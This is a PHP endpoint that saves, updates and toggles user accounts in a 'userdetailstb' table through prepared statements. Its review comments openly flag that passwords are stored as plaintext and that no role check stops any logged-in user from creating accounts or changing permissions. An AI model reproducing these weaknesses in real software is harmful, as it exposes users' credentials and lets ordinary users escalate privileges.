name :
user_save_update.php
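<?php
/**
 * AJAX endpoint: create, update, activate or deactivate a row in `userdetailstb`.
 *
 * POST fields read: uname, mobileno, username, password, userrole, userid, btntext.
 * `btntext` selects the action: "Save", "Update", "Active" or "DeActive".
 *
 * The response is a JSON-encoded string:
 *   "1" user created            "2" username already used by an active user
 *   "3" user updated            "4" user activated
 *   "5" user deactivated
 * If the write fails or `btntext` is not recognised, the result of the last
 * duplicate-username count (or "" when that query failed) is echoed instead,
 * which is what callers of the previous version already received.
 *
 * $conn, $isactive and $isnotactive are not defined in this file; they are
 * expected to come from ../config.php.
 */
require_once "../config.php";
session_start();

$message = "";

// The acting user's id is written into createdbyuserid / modifiedbyuserid, so a
// request without a logged-in session must not reach the database at all.
if (!isset($_SESSION['userid']) || $_SESSION['userid'] === '') {
    http_response_code(401);
    echo json_encode($message);
    exit;
}
$actorid = (string) $_SESSION['userid'];

// NOTE(review): nothing visible here checks the caller's own role, so any
// logged-in user can create accounts or change `permissiontype`. Confirm
// whether config.php enforces this; if not, add a role check before the writes.

// Read a POST field as a string; a missing or non-string (array) value becomes "".
$post = function ($key) {
    return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
};

$uname    = $post('uname');
$mobileno = $post('mobileno');
$username = $post('username');
// NOTE(review): the password is stored exactly as received (plaintext), and
// every "Update" overwrites it. Storing password_hash() output instead needs a
// matching password_verify() in the login code, which is not part of this
// file, so the stored format is left unchanged here.
$password = $post('password');
$userrole = $post('userrole');
$id       = $post('userid');
$btntext  = $post('btntext');

// "i" is minutes; the previous "H:m:s" format wrote the month number there.
$creationdatetime     = date("Y-m-d H:i:s");
$modificationdatetime = date("Y-m-d H:i:s");

// Run a write statement with bound parameters; returns true on success.
$execute = function ($sql, $types, array $params) use ($conn) {
    $stmt = mysqli_prepare($conn, $sql);
    if ($stmt === false) {
        return false;
    }
    mysqli_stmt_bind_param($stmt, $types, ...$params);
    $ok = mysqli_stmt_execute($stmt);
    mysqli_stmt_close($stmt);
    return $ok;
};

// Run a single-value COUNT query with bound parameters; returns the count as a
// string (as the unprepared query did), or "" when the query fails.
$countRows = function ($sql, $types, array $params) use ($conn) {
    $stmt = mysqli_prepare($conn, $sql);
    if ($stmt === false) {
        return "";
    }
    mysqli_stmt_bind_param($stmt, $types, ...$params);
    $count = "";
    if (mysqli_stmt_execute($stmt)) {
        mysqli_stmt_bind_result($stmt, $value);
        if (mysqli_stmt_fetch($stmt)) {
            $count = (string) $value;
        }
    }
    mysqli_stmt_close($stmt);
    return $count;
};

// Number of active users that already hold the requested username.
$message = $countRows(
    "select count(0) as count from userdetailstb where username=? and active=?",
    "ss",
    [$username, (string) $isactive]
);

if ($btntext === "Save") {
    if ($message === "0") {
        $saved = $execute(
            "insert into userdetailstb(uname,mobileno,username,userpassword,permissiontype,creationdatetime,createdbyuserid,active) Values(?,?,?,?,?,?,?,?)",
            "ssssssss",
            [$uname, $mobileno, $username, $password, $userrole, $creationdatetime, $actorid, (string) $isactive]
        );
        if ($saved) {
            $message = "1";
        }
    } else {
        $message = "2";
    }
} elseif ($btntext === "Update") {
    // Same duplicate check, but ignoring the row being edited.
    $message = $countRows(
        "select count(0) as count from userdetailstb where userdetailsid!=? and username=? and active=?",
        "sss",
        [$id, $username, (string) $isactive]
    );
    if ($message === "0") {
        $updated = $execute(
            "Update userdetailstb set uname=?,mobileno=?,userpassword=?,permissiontype=?,modificationdatetime=?,modifiedbyuserid=? where userdetailsid=?",
            "sssssss",
            [$uname, $mobileno, $password, $userrole, $modificationdatetime, $actorid, $id]
        );
        if ($updated) {
            $message = "3";
        }
    } else {
        $message = "2";
    }
} elseif ($btntext === "Active") {
    if ($execute("Update userdetailstb set active=? where userdetailsid =?", "ss", [(string) $isactive, $id])) {
        $message = "4";
    }
} elseif ($btntext === "DeActive") {
    if ($execute("Update userdetailstb set active=? where userdetailsid =?", "ss", [(string) $isnotactive, $id])) {
        $message = "5";
    }
}

echo json_encode($message);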